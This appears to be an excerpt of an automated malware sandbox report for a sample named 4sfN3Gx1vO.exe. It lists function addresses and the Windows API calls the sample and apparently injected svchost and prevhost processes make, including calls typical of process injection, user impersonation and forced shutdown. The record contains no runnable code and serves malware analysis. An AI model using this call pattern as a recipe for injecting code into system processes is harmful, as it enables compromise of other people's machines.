Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0250CBE3 NtClose,	2_2_0250CBE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk,	2_2_02F72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_02F72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_02F72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,	2_2_02F735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F74340 NtSetContextThread,	2_2_02F74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F74650 NtSuspendThread,	2_2_02F74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AF0 NtWriteFile,	2_2_02F72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AD0 NtReadFile,	2_2_02F72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72AB0 NtWaitForSingleObject,	2_2_02F72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BF0 NtAllocateVirtualMemory,	2_2_02F72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BE0 NtQueryValueKey,	2_2_02F72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72BA0 NtEnumerateValueKey,	2_2_02F72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72B80 NtQueryInformationFile,	2_2_02F72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72EE0 NtQueueApcThread,	2_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken,	2_2_02F72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72E80 NtReadVirtualMemory,	2_2_02F72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72E30 NtWriteVirtualMemory,	2_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FE0 NtCreateFile,	2_2_02F72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FB0 NtResumeThread,	2_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72FA0 NtQuerySection,	2_2_02F72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F90 NtProtectVirtualMemory,	2_2_02F72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F60 NtCreateProcessEx,	2_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72F30 NtCreateSection,	2_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CF0 NtOpenProcess,	2_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CC0 NtQueryVirtualMemory,	2_2_02F72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72CA0 NtQueryInformationToken,	2_2_02F72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C60 NtCreateKey,	2_2_02F72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72C00 NtQueryInformationProcess,	2_2_02F72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DD0 NtDelayExecution,	2_2_02F72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72DB0 NtEnumerateKey,	2_2_02F72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D30 NtUnmapViewOfSection,	2_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D10 NtMapViewOfSection,	2_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72D00 NtSetInformationFile,	2_2_02F72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73090 NtSetValueKey,	2_2_02F73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73010 NtOpenDirectoryObject,	2_2_02F73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F739B0 NtGetContextThread,	2_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73D70 NtOpenThread,	2_2_02F73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F73D10 NtOpenProcessToken,	2_2_02F73D10
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05124650 NtSuspendThread,LdrInitializeThunk,	5_2_05124650
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05124340 NtSetContextThread,LdrInitializeThunk,	5_2_05124340
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_05122D10
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_05122D30
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122DD0 NtDelayExecution,LdrInitializeThunk,	5_2_05122DD0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05122DF0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_05122C70
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122C60 NtCreateKey,LdrInitializeThunk,	5_2_05122C60
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_05122CA0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122F30 NtCreateSection,LdrInitializeThunk,	5_2_05122F30
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122FB0 NtResumeThread,LdrInitializeThunk,	5_2_05122FB0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122FE0 NtCreateFile,LdrInitializeThunk,	5_2_05122FE0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_05122E80
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_05122EE0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122B60 NtClose,LdrInitializeThunk,	5_2_05122B60
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_05122BA0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_05122BF0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_05122BE0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122AD0 NtReadFile,LdrInitializeThunk,	5_2_05122AD0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122AF0 NtWriteFile,LdrInitializeThunk,	5_2_05122AF0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051235C0 NtCreateMutant,LdrInitializeThunk,	5_2_051235C0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051239B0 NtGetContextThread,LdrInitializeThunk,	5_2_051239B0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122D00 NtSetInformationFile,	5_2_05122D00
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122DB0 NtEnumerateKey,	5_2_05122DB0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122C00 NtQueryInformationProcess,	5_2_05122C00
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122CC0 NtQueryVirtualMemory,	5_2_05122CC0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122CF0 NtOpenProcess,	5_2_05122CF0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122F60 NtCreateProcessEx,	5_2_05122F60
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122F90 NtProtectVirtualMemory,	5_2_05122F90
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122FA0 NtQuerySection,	5_2_05122FA0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122E30 NtWriteVirtualMemory,	5_2_05122E30
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122EA0 NtAdjustPrivilegesToken,	5_2_05122EA0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122B80 NtQueryInformationFile,	5_2_05122B80
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05122AB0 NtWaitForSingleObject,	5_2_05122AB0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05123010 NtOpenDirectoryObject,	5_2_05123010
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05123090 NtSetValueKey,	5_2_05123090
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05123D10 NtOpenProcessToken,	5_2_05123D10
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05123D70 NtOpenThread,	5_2_05123D70
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F793A0 NtCreateFile,	5_2_02F793A0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F796A0 NtClose,	5_2_02F796A0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F79600 NtDeleteFile,	5_2_02F79600
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F79510 NtReadFile,	5_2_02F79510
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_02F79800 NtAllocateVirtualMemory,	5_2_02F79800

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0057D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0057D5EB

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_00571201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00571201

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe

Code function: 0_2_0057E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0057E8F6

Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0051BF40	0_2_0051BF40
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00582046	0_2_00582046
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00518060	0_2_00518060
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00578298	0_2_00578298
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0054E4FF	0_2_0054E4FF
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0054676B	0_2_0054676B
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005A4873	0_2_005A4873
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0051CAF0	0_2_0051CAF0
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0053CAA0	0_2_0053CAA0
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0052CC39	0_2_0052CC39
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00546DD9	0_2_00546DD9
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0052B119	0_2_0052B119
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005191C0	0_2_005191C0
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00531394	0_2_00531394
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00531706	0_2_00531706
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0053781B	0_2_0053781B
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0052997D	0_2_0052997D
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00517920	0_2_00517920
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_005319B0	0_2_005319B0
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00537A4A	0_2_00537A4A
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00531C77	0_2_00531C77
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00537CA7	0_2_00537CA7
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_0059BE44	0_2_0059BE44
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00549EEE	0_2_00549EEE
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_00531F32	0_2_00531F32
Source: C:\Users\user\Desktop\4sfN3Gx1vO.exe	Code function: 0_2_01604070	0_2_01604070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F4283	2_2_024F4283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F8A83	2_2_024F8A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F0263	2_2_024F0263
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0250F213	2_2_0250F213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E32A0	2_2_024E32A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E4844	2_2_024E4844
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E11C0	2_2_024E11C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E29A0	2_2_024E29A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024E11B5	2_2_024E11B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024EE463	2_2_024EE463
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F6C7E	2_2_024F6C7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F6C83	2_2_024F6C83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024F0483	2_2_024F0483
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024EE5A8	2_2_024EE5A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_024EE5B3	2_2_024EE5B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC02C0	2_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030003E6	2_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA352	2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030001AA	2_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF81CC	2_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC8158	2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30100	2_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5C6E0	2_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3C7C0	2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64750	2_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEE4F6	2_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03000591	2_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF2446	2_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF6BD7	2_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFAB40	2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E8F0	2_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F268B8	2_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300A9A6	2_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4A840	2_2_02F4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F42840	2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F429A0	2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F56962	2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFEEDB	2_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52E90	2_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFCE93	2_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40E59	2_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFEE26	2_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4CFE0	2_2_02F4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32FC8	2_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBEFA0	2_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4F40	2_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60F30	2_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F82F28	2_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30CF2	2_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0CB5	2_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40C00	2_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3ADE0	2_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F58DBF	2_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4AD00	2_2_02F4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE12ED	2_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5B2C0	2_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F452A0	2_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F8739A	2_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2D34C	2_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF132D	2_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF70E9	2_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF0E0	2_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEF0CC	2_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F470C0	2_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0300B16B	2_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4B1B0	2_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2F172	2_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7516C	2_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF16CC	2_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF7B0	2_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F31460	2_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFF43F	2_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDD5B0	2_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7571	2_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEDAC6	2_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDDAAC	2_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F85AA0	2_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB3A6C	2_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFA49	2_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7A46	2_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB5BF0	2_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F7DBF9	2_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5FB80	2_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFB76	2_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F438E0	2_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAD800	2_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F49950	2_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5B950	2_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD5910	2_2_02FD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F49EB0	2_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFFB1	2_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F41F92	2_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFF09	2_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFFCF2	2_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB9C32	2_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5FDC0	2_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF7D73	2_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF1D5A	2_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F43D40	2_2_02F43D40
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F0535	5_2_050F0535
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051B0591	5_2_051B0591
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A2446	5_2_051A2446
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0519E4F6	5_2_0519E4F6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05114750	5_2_05114750
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F0770	5_2_050F0770
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050EC7C0	5_2_050EC7C0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0510C6E0	5_2_0510C6E0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0518A118	5_2_0518A118
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050E0100	5_2_050E0100
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05178158	5_2_05178158
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051B01AA	5_2_051B01AA
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A81CC	5_2_051A81CC
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05182000	5_2_05182000
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AA352	5_2_051AA352
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051B03E6	5_2_051B03E6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050FE3F0	5_2_050FE3F0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05190274	5_2_05190274
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051702C0	5_2_051702C0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050FAD00	5_2_050FAD00
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05108DBF	5_2_05108DBF
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050EADE0	5_2_050EADE0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F0C00	5_2_050F0C00
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05190CB5	5_2_05190CB5
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050E0CF2	5_2_050E0CF2
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05110F30	5_2_05110F30
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05132F28	5_2_05132F28
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05164F40	5_2_05164F40
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0516EFA0	5_2_0516EFA0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050E2FC8	5_2_050E2FC8
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050FCFE0	5_2_050FCFE0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AEE26	5_2_051AEE26
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F0E59	5_2_050F0E59
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05102E90	5_2_05102E90
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051ACE93	5_2_051ACE93
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AEEDB	5_2_051AEEDB
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_05106962	5_2_05106962
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F29A0	5_2_050F29A0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051BA9A6	5_2_051BA9A6
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050F2840	5_2_050F2840
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050FA840	5_2_050FA840
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050D68B8	5_2_050D68B8
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0511E8F0	5_2_0511E8F0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AAB40	5_2_051AAB40
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A6BD7	5_2_051A6BD7
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050EEA80	5_2_050EEA80
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A7571	5_2_051A7571
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_0518D5B0	5_2_0518D5B0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AF43F	5_2_051AF43F
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_050E1460	5_2_050E1460
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051AF7B0	5_2_051AF7B0
Source: C:\Windows\SysWOW64\prevhost.exe	Code function: 5_2_051A16CC	5_2_051A16CC
